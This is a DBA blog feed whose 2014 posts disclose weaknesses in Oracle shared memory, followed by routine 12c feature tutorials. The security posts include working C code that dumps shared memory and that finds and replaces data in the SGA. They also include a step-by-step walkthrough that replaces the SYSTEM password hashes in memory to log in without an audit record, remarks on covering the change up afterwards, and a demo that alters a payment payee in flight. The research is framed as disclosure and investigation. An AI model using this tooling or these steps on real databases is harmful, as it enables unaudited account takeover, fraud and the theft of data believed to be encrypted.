ContractOracle

Subscribe to ContractOracle feed
Contract Oracle Limited is not affiliated to Oracle Corporation.
Updated: 9 hours 26 min ago

ContractOracle.com is for sale

Sun, 2018-01-28 20:30
If you would like to purchase this domain, email Robert.Geier@ContractOracle.com

This domain is perfect if you are a contractor working with Oracle software. 
Categories: DBA Blogs

Oracle encrypted table data found unencrypted in SGA

Sun, 2014-07-13 22:29
When data needs to be kept private, or companies are worried about data leakage, then they often choose to store that data in encrypted columns in the table using Oracle Transparent Data Encryption. 

I wanted to see if that data was stored in the SGA in an unencrypted format.  I ran the following test from sqlplus.

CDB$ROOT@ORCL> create table credit_card_number(card_number char(16) encrypt);

Table created.

CDB$ROOT@ORCL> insert into credit_card_number values ('4321432143214321');

1 row created.

CDB$ROOT@ORCL> update credit_card_number set card_number = '5432543254325432' where card_number = '4321432143214321';

1 row updated.

CDB$ROOT@ORCL> VARIABLE cardnumber char(16);
CDB$ROOT@ORCL> EXEC :cardnumber := '6543654365436543';

PL/SQL procedure successfully completed.

CDB$ROOT@ORCL> update credit_card_number set card_number = :cardnumber where card_number = '5432543254325432';

1 row updated.

CDB$ROOT@ORCL> commit;

Now we search SGA for the data that should be encrypted to keep it private.  


[oracle@localhost shared_memory]$ ./sga_search 4321432143214321
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 459100
4321432143214321
/dev/shm/ora_orcl_38895617_30 found string at 3244704
4321432143214321
/dev/shm/ora_orcl_38895617_29 found string at 2529984
4321432143214321
[oracle@localhost shared_memory]$ ./sga_search 5432543254325432
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 459061
5432543254325432
/dev/shm/ora_orcl_38895617_30 found string at 4106466
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2075064
5432543254325432
/dev/shm/ora_orcl_38895617_29 found string at 2528552
5432543254325432
/dev/shm/ora_orcl_38895617_28 found string at 1549533
5432543254325432
[oracle@localhost shared_memory]$ ./sga_search 6543654365436543
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- 6543654365436543
/dev/shm/ora_orcl_38895617_29 found string at 3801400
6543654365436543

The output shows that all 3 of the card_number values used in the demonstration can be found in SGA, sometimes in multiple locations.  Flushing the buffer cache did not clear the data from SGA, but flushing the shared pool did.  Further analysis is needed to confirm exactly where in the shared pool the unencrypted data is being stored to confirm if it is in sql statements, sql variables, or interim values kept by the encryption process.  Further testing is also needed to see if it is possible to avoid potential data leakage by using bind variables or wrapping sql in plsql.  In the meantime ... be aware that data you believe to be encrypted may actually be stored in memory in clear text visible to anyone with privileges to connect to the SGA.

Oracle TDE FAQ  :- http://www.oracle.com/technetwork/database/security/tde-faq-093689.html
States that "With TDE column encryption, encrypted data remains encrypted inside the SGA, but with TDE tablespace encryption, data is already decrypted in the SGA, which provides 100% transparency."
Categories: DBA Blogs

Oracle encryption wallet password found in SGA

Sun, 2014-07-13 21:51
If companies are worried about data privacy or leakage, they are often recommended to encrypt sensitive data inside Oracle databases to stop DBAs from accessing it, and implement "separation of duties" so that only the application or data owner has the encryption keys or wallet password.  One method to encrypt data is to use Oracle Transparent Database Encryption which stores keys in the Oracle wallet protected by a wallet password.  Best practice dictates using a very long wallet password to avoid rainbow tables and brute force attacks, and keep the key and password secret.

I wrote a simple program to search for data in Oracle shared memory segments, and it was able to find the Oracle wallet password, which means anyone who can connect to the shared memory can get the wallet password and access the encrypted data.  The following demonstrates this :-

First open and close the wallet using the password :-


CDB$ROOT@ORCL> alter system set encryption wallet open identified by "verylongverysecretwalletpassword1";

System altered.

CDB$ROOT@ORCL> alter system set wallet close identified by "verylongverysecretwalletpassword1";

System altered.


Now search for the wallet password in SGA :-

oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1

The search found the password in SGA, so it should be possible to analyse the memory structure that currently stores the known password, and create another program to directly extract passwords on unknown systems.  It may also be possible to find the password by selecting from v$ or x$ tables.  I have not done that analysis, so don't know how difficult it would be, but if the password is stored, it will be possible to extract it, and even if it is mixed up with a lot of other sql text and variables it would be very simple to just try opening the wallet using every string stored in SGA.

The password is still in SGA after flushing the buffer cache.

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
/dev/shm/ora_orcl_35258369_30 found string at 3473189
verylongverysecretwalletpassword1


After flushing the shared pool the password is no longer available.  

CDB$ROOT@ORCL> alter system flush shared_pool;

System altered.


[oracle@localhost shared_memory]$ ./sga_search verylongverysecretwalletpassword1
USAGE :- sga_search searchstring


Number of input parameters seem correct.
SEARCH FOR   :- verylongverysecretwalletpassword1
[oracle@localhost shared_memory]$ 

As this password really should be secret, Oracle really should not store it.   More research is needed to confirm if the password can be hidden by using bind variables, obfuscation, or wrapping it in plsql.
Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

Fri, 2014-07-11 04:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in SGA were updated, and the database did not crash, or detect the data change, and allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back-out the changes made to SGA to the original hash values to cover up completely.

Sample output from the first SGA update command above follows :-

[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

Fri, 2014-07-11 03:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include stdio.h
#include stdlib.h
#include ctype.h
#include dirent.h
#include string.h
#include unistd.h
#include sys/file.h
#include sys/mman.h

replace_sga(char search_string[],char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        for (i = 0; i < fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

Fri, 2014-07-11 03:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

Thu, 2014-07-10 05:42
Vendors sell some rather expensive software for auditing Oracle database, and coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  

It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.

Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.

PDB1@ORCL> create table payment_batch (payee char(6));

Table created.

PDB1@ORCL> insert into payment_batch values ('vendor');

1 row created.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

PDB1@ORCL> commit;

Commit complete.

PDB1@ORCL> alter system flush buffer_cache;

System altered.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

C program to dump shared memory segments to disk on Linux.

Tue, 2014-07-08 02:26
The following program was written to help investigate Oracle database shared memory on Linux.  It dumps the contents of existing shared memory segments to files on disk.  Note that it won't work against Oracle 11g and 12C databases as they use mmap instead of shmat for managing shared memory.  Sample program for reading from 11g and 12C here (mmap example )

Compile it using "gcc -o shared shared.c"  It is free for anyone to copy or modify as they wish, but I do not guarantee the functionality.

Check the format of the include listings below as I had to remove hashes and greater-than/less-than symbols to keep blogger happy.

include stdio.h
include stdlib.h
include sys/shm.h


int main (int argc, char *argv[]) {
    int maxkey, id, shmid = 0;
    struct shm_info shm_info;
    struct shmid_ds shmds;
    void * shared_data;
    FILE * outfile;
    
    maxkey = shmctl(0, SHM_INFO, (void *) &shm_info);
    for(id = 0; id <= maxkey; id++) {
        shmid = shmctl(id, SHM_STAT, &shmds);
        char shmidchar[16];
        snprintf(shmidchar, sizeof(shmidchar), "%d", shmid);
        if (shmid < 0)
            continue;
        if(shmds.shm_segsz > 0) {
            printf("Shared memory segment %s found.\n",shmidchar);
            
            shared_data = shmat(shmid, NULL, 0666);
            if(shared_data != NULL) {
                outfile = fopen(shmidchar, "wb");
                if(outfile == NULL) {
                    printf("Could not open file %s for writing.", shmidchar);
                }
                else {
                    fwrite(shared_data, shmds.shm_segsz, 1, outfile);
                    fclose(outfile);
                    
                    printf("Dumped to file %s\n\n", shmidchar);
                }
            }
        }
    }
}



Categories: DBA Blogs

Oracle 12c New Features - Convert a database to be Pluggable

Mon, 2013-07-01 22:08
In a previous blog post I demonstrated creating a Pluggable Database (PDB) from the PDB$SEED database  which is created at the same time as the Container Database (CDB).  That process was quick and easy, but is only useful for creating new empty databases.  

If we want to migrate existing databases which contain data (e.g upgraded from 11g) to the CDB/PDB multitenant architecture we need to convert them to be PDBs so we can plug them in.

For this example I created a stand-alone database called NONCDB.

[oracle@rac1 T12]$ export ORACLE_SID=NONCDB
[oracle@rac1 T12]$ sqlplus / as sysdba

SQL*Plus: Release 12.1.0.1.0 Production on Tue Jul 2 10:31:54 2013

Copyright (c) 1982, 2013, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

We can see in v$database that it is not a CDB or PDB.

SQL> select CDB from v$database;

CDB
---
NO

To convert it to be a PDB we first need to get the database in a consistent state and run DBMS_PDB.DESCRIBE to create an XML file to describe the database.


SQL> shutdown immediate;

Database closed.

Database dismounted.
ORACLE instance shut down.
SQL> startup mount;
ORACLE instance started.

Total System Global Area 1235959808 bytes
Fixed Size                  2287816 bytes
Variable Size             452986680 bytes
Database Buffers          771751936 bytes
Redo Buffers                8933376 bytes
Database mounted.
SQL> alter database open read only;

Database altered.

SQL> BEGIN
 DBMS_PDB.DESCRIBE(
  pdb_descr_file => '/u01/app/oracle/oradata/NONCDB/noncdb.xml');
 END;

PL/SQL procedure successfully completed.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> exit

Now we can plug NONCDB into a existing CDB database T12.

[oracle@rac1 T12]$ export ORACLE_SID=T12
[oracle@rac1 T12]$ sqlplus / as sysdba

SQL*Plus: Release 12.1.0.1.0 Production on Tue Jul 2 10:42:01 2013

Copyright (c) 1982, 2013, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

SQL> select CDB from v$database;

CDB
---
YES

I am plugging the database in to a CDB on the same server as the original database so I will create the PDB with NOCOPY TEMPFILE REUSE.  If you are changing directory structures then you would need to use FILE_NAME_CONVERT.

SQL> CREATE PLUGGABLE DATABASE NONCDB USING '/u01/app/oracle/oradata/NONCDB/noncdb.xml' NOCOPY tempfile reuse;

Pluggable database created.

Now we need to update the data dictionary in the new PDB by running noncdb_to_pdb.sql

SQL> alter session set container=NONCDB;

Session altered.

SQL> @$ORACLE_HOME/rdbms/admin/noncdb_to_pdb.sql

This script has a lot of output which I will not show but unfortunately it ended with an error :-

SQL> -- get rid of idl_ub1$ rows for MDL java objects
SQL> delete from sys.idl_ub1$ where obj# in (select obj# from sys.obj$ where bitand(flags, 65536)=65536 and type# in (28,29,30,56));
^Cdelete from sys.idl_ub1$ where obj# in (select obj# from sys.obj$ where bitand(flags, 65536)=65536 and type# in (28,29,30,56))
                *
ERROR at line 1:
ORA-01013: user requested cancel of current operation

The new PDB was left in READ WRITE state after the script exited and seems usable, but due to the error I can't be sure everything completed OK so it would be worth checking with Oracle Support.


SQL> select name, open_mode from v$pdbs;



NAME                           OPEN_MODE
------------------------------ ----------
PDB$SEED                       READ ONLY
NONCDB                         READ WRITE

SQL> alter session set container=NONCDB;

Session altered.

SQL> create user test identified by test;

User created.

We can see that by converting the existing database to a PDB it only kept the SYSTEM, SYSAUX, USERS tablespaces, and has dropped  the UNDO datafiles along with the original REDO logs and control files.

SQL> select file_name from dba_data_files;

FILE_NAME
-----------------------------------------------------------------
/u01/app/oracle/oradata/NONCDB/system01.dbf
/u01/app/oracle/oradata/NONCDB/sysaux01.dbf
/u01/app/oracle/oradata/NONCDB/users01.dbf


[oracle@rac1 NONCDB]$ pwd
/u01/app/oracle/oradata/NONCDB
[oracle@rac1 NONCDB]$ ls -lrt
total 1712016
-rw-r----- 1 oracle oinstall  52429312 Jul  2 10:30 redo03.log
-rw-r----- 1 oracle oinstall  52429312 Jul  2 10:30 redo02.log
-rw-r----- 1 oracle oinstall  52429312 Jul  2 10:36 redo01.log
-rw-r----- 1 oracle oinstall  57679872 Jul  2 10:37 undotbs01.dbf
-rw-r--r-- 1 oracle oinstall      3986 Jul  2 10:38 noncdb.xml
-rw-r----- 1 oracle oinstall  10043392 Jul  2 10:39 control02.ctl
-rw-r----- 1 oracle oinstall  10043392 Jul  2 10:39 control01.ctl
-rw-r----- 1 oracle oinstall  62922752 Jul  2 10:45 temp01.dbf
-rw-r----- 1 oracle oinstall   5251072 Jul  2 11:03 users01.dbf
-rw-r----- 1 oracle oinstall 807411712 Jul  2 11:03 system01.dbf
-rw-r----- 1 oracle oinstall 702554112 Jul  2 11:03 sysaux01.dbf
Categories: DBA Blogs

Oracle 12c New Features - Query CDB_PDB_HISTORY for Pluggable Database History

Mon, 2013-07-01 03:45
If you are interested in checking the history of PDBs, then view CDB_PDB_HISTORY is a good place to start.

SQL> SELECT DB_NAME, CON_ID, PDB_NAME, OPERATION, OP_TIMESTAMP, CLONED_FROM_PDB_NAME
FROM CDB_PDB_HISTORY WHERE CON_ID > 2 ORDER BY 5;  

DB_NAME    CON_ID PDB_NAME        OPERATION        OP_TIMESTA CLONED_FROM_PDB
---------- ------ --------------- ---------------- ---------- ---------------
SEEDDATA        5 PDB$SEED        UNPLUG           24-MAY-13
SEEDDATA        3 PDB$SEED        UNPLUG           24-MAY-13
SEEDDATA        4 PDB$SEED        UNPLUG           24-MAY-13
T12             5 PDB$SEED        PLUG             01-JUL-13  PDB$SEED
T12             3 PDB$SEED        PLUG             01-JUL-13  PDB$SEED
T12             4 PDB$SEED        PLUG             01-JUL-13  PDB$SEED
T12             5 PDB1            CREATE           01-JUL-13  PDB$SEED
T12             3 PDB1            CREATE           01-JUL-13  PDB$SEED
T12             4 PDB1            CREATE           01-JUL-13  PDB$SEED
T12             5 PDB1            UNPLUG           01-JUL-13
T12             3 PDB1            UNPLUG           01-JUL-13
T12             4 PDB1            UNPLUG           01-JUL-13
T12             5 PDB1            PLUG             01-JUL-13  PDB1
T12             3 PDB1            PLUG             01-JUL-13  PDB1
T12             4 PDB1            PLUG             01-JUL-13  PDB1
T12             5 PDB1            UNPLUG           01-JUL-13
T12             3 PDB1            UNPLUG           01-JUL-13
T12             4 PDB1            UNPLUG           01-JUL-13
T12             5 PDB1            PLUG             01-JUL-13  PDB1
T12             3 PDB1            PLUG             01-JUL-13  PDB1
T12             4 PDB1            PLUG             01-JUL-13  PDB1
T12             5 PDB1            UNPLUG           01-JUL-13
T12             3 PDB1            UNPLUG           01-JUL-13
T12             4 PDB1            UNPLUG           01-JUL-13
T12             4 PDB2            PLUG             01-JUL-13  PDB1
T12             5 PDB1            PLUG             01-JUL-13  PDB1
T12             3 PDB1            PLUG             01-JUL-13  PDB1
T12             5 PDB3            CLONE            01-JUL-13  PDB1

Categories: DBA Blogs

Oracle 12c New Features - TEMP_UNDO_ENABLED

Mon, 2013-07-01 01:12
Oracle 12c introduces new parameter TEMP_UNDO_ENABLED which can be set at database and session level.  If this parameter is enabled, then undo for temporary objects (e.g global temporary tables) is written to the TEMP tablespace, compared to the default of writing to the UNDO tablespace.  This can help improve performance and reduce UNDO and REDO.

SQL> connect test/test@pdb1
Connected.

SQL> CREATE GLOBAL TEMPORARY TABLE my_temp_table (id integer) ON COMMIT PRESERVE ROWS;

Table created.

SQL> show parameter temp_undo_enabled

NAME                                 TYPE        VALUE
------------------------------------ ----------- ----------------
temp_undo_enabled                    boolean     FALSE

Now run an insert to the global temporary table with the parameter set to FALSE. 

SQL> set autotrace on statistics
SQL> insert into my_temp_table values (1);

1 row created.


Statistics
----------------------------------------------------------
          1  recursive calls
          8  db block gets
          1  consistent gets
          0  physical reads
        312  redo size
        853  bytes sent via SQL*Net to client
        837  bytes received via SQL*Net from client
          3  SQL*Net roundtrips to/from client
          1  sorts (memory)
          0  sorts (disk)
          1  rows processed

According to Autotrace statistics this generates redo of 312.

SQL> connect test/test@pdb1
Connected.
SQL> alter session set temp_undo_enabled=true;

Session altered.

Now run the insert again with the parameter set to TRUE.  

SQL> set autotrace on statistics
SQL> insert into my_temp_table values (1);

1 row created.


Statistics
----------------------------------------------------------
          3  recursive calls
         13  db block gets
          1  consistent gets
          0  physical reads
        280  redo size
        850  bytes sent via SQL*Net to client
        837  bytes received via SQL*Net from client
          3  SQL*Net roundtrips to/from client
          1  sorts (memory)
          0  sorts (disk)
          1  rows processed

According to Autotrace statistics this generates redo of 280 (compared to 312).  Reduced UNDO and REDO from temporary transactions can help the performance of the database and reduce disk space for UNDO tablespaces, archivelogs, and backups. The Oracle documentation says "If database applications make use of temporary objects (using global temporary tables or temporary table transformations), it is advisable to set this parameter's value to true."  

Statistics on TEMP UNDO are available via V$TEMPUNDOSTAT

SQL> desc V$TEMPUNDOSTAT
 Name                                      Null?    Type
 ----------------------------------------- -------- -------------
 BEGIN_TIME                                         DATE
 END_TIME                                           DATE
 UNDOTSN                                            NUMBER
 TXNCOUNT                                           NUMBER
 MAXCONCURRENCY                                     NUMBER
 MAXQUERYLEN                                        NUMBER
 MAXQUERYID                                         VARCHAR2(13)
 UNDOBLKCNT                                         NUMBER
 EXTCNT                                             NUMBER
 USCOUNT                                            NUMBER
 SSOLDERRCNT                                        NUMBER
 NOSPACEERRCNT                                      NUMBER
 CON_ID                                             NUMBER

More details here :- http://docs.oracle.com/cd/E16655_01/server.121/e17615/refrn10326.htm#REFRN10326



Categories: DBA Blogs

parameter ENABLE_DDL_LOGGING

Sun, 2013-06-30 23:43
If Oracle parameter ENABLE_DDL_LOGGING is enabled DDL records are written to the ADR.

SQL> show parameter enable_ddl_logging

NAME                                 TYPE        VALUE
------------------------------------ ----------- ----------------
enable_ddl_logging                   boolean     FALSE

SQL> alter system set enable_ddl_logging=true;

System altered.

SQL> connect c##test/test@pdb1
Connected.
SQL> create view x as select * from user_views;

View created.

SQL> drop view x;

View dropped.

SQL> exit
Disconnected from Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics, Real Application Testing
and Unified Auditing options

[oracle@rac1 log]$ pwd
/u01/app/oracle/diag/rdbms/t12/T12/log
[oracle@rac1 log]$ ls
ddl  ddl_T12.log  debug  test
[oracle@rac1 log]$ more *.log
Mon Jul 01 12:35:54 2013
diag_adl:create view x as select * from user_views
diag_adl:drop view x

[oracle@rac1 log]$ cd ddl
[oracle@rac1 ddl]$ more *.xml
 msg_id='kpdbLogDDL:15115:2946163730' type='UNKNOWN' group='diag_adl'
 level='16' host_id='rac1.test.com' host_addr='192.168.1.205'
 version='1'>
 create view x as select * from user_views
 msg_id='kpdbLogDDL:15115:2946163730' type='UNKNOWN' group='diag_adl'
 level='16' host_id='rac1.test.com' host_addr='192.168.1.205'>
 drop view x

Categories: DBA Blogs

Oracle 12c New Features - Clone a Plugged In Database

Sun, 2013-06-30 23:21
One of the benefits of the CDB/PDB model in Oracle 12c is that it allows rapid cloning of Pluggable Databases (PDB).  To create a clone database in previous versions of Oracle the DBA would have needed to create a new database instance with a new set of parameters and then clone the source database files using rman.  

